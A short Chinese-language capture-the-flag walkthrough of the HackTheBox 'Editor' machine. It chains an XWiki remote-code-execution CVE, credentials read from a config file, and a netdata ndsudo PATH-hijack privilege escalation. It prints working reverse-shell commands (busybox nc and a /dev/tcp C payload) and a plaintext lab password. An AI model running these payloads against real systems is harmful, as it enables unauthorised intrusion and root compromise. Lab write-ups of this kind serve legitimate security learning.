nmap -T4 -v -A -Pn 10.10.11.80 -oN editor.txt

80 和 8080 两个端口

USER

CVE-2025-24893

在 8080 端口有 xwiki

https://github.com/gunzf0x/CVE-2025-24893

有这个漏洞,可以测试看到成功执行

python CVE-2025-24893.py -t "http://editor.htb:8080" -c 'busybox nc 10.10.14.45 8081 -e /bin/bash'

起一个伪终端

python3 -c "import pty;pty.spawn('/bin/bash');"

configuration file

/usr/lib/xwiki/WEB-INF/hibernate.cfg.xml 是 xwiki 数据库的配置文件

查看一下

可以发现配置信息包含密码

/home目录下只有一个 oliver 账户

使用这个密码可以成功登录,并有 user.txt

oliver:theEd1t0rTeam99

ROOT

CVE-2024-32019

sudo -l 没东西,传 linpeas.sh

在结果里面我们可以看到有 netdata 这个 user,这是一个性能监控的开源系统

而且有很多应该是他自带的程序

问了 ai,这个 ndsudo 应该可以利用一下

https://github.com/AliElKhatteb/CVE-2024-32019-POC

#include <unistd.h>  // for setuid, setgid, execl
#include <stddef.h>  // for NULL

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-c", "bash -i >& /dev/tcp/ADD_YOU_IP_ADDRESS/9001 0>&1", NULL);
    return 0;
}

gcc 编译好之后传到目标机器

然后用 ndsudo 来执行

mv exp /tmp/nvme
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

就能接收到反弹了,看到 root.txt


"The quieter you become, the more you are able to hear."